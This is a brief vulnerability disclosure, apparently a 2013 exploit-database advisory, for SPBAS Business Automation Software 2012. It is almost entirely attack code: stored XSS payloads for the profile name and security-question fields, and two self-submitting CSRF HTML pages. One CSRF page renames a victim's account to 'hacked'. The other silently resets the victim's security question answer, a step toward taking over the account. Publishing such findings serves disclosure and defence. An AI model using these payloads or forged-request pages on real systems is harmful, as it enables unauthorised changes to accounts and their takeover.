# SPBAS Business Automation Software- XSS & CSRF Vulnerability
# Date: 16 June 2013
# Author: Christy Philip Mathew - www.offcon.org
# Vendor or Software Link: http://demo.spbas.com
# Version: 2012


*1.XSS Vulnerability*

(a) Client Area -> My Info -> Update the first name and last name to

john"><img src=x onerror=prompt(0);>

(b) Update the security question to

john"><img src=x onerror=prompt(0);>


*2.Cross Site Request Forgery*

(a) Change Customer Information

<html>

     <body onload=document.forms[0].submit();>
    <form action="http://website.com/customers/index.php" method="POST">
      <input type="hidden" name="task" value="my&#95;account" />
      <input type="hidden" name="tab" value="my&#95;info" />
      <input type="hidden" name="update&#95;my&#95;info" value="y" />
      <input type="hidden" name="first&#95;name" value="hacked" />
      <input type="hidden" name="last&#95;name" value="hacked" />
      <input type="hidden" name="username" value="hacked" />
      <input type="hidden" name="form&#95;submission"
value="Save&#32;Changes" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


(b) Change Security Question Answer

<html>

   <body onload=document.forms[0].submit();>
    <form action="http://website.com/customers/index.php" method="POST">
      <input type="hidden" name="task" value="my&#95;account" />
      <input type="hidden" name="tab" value="security&#95;question" />
      <input type="hidden" name="change&#95;security&#95;question"
value="y" />
      <input type="hidden" name="question" value="1" />
      <input type="hidden" name="answer" value="test" />
      <input type="hidden" name="form&#95;submission"
value="Save&#32;Changes" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>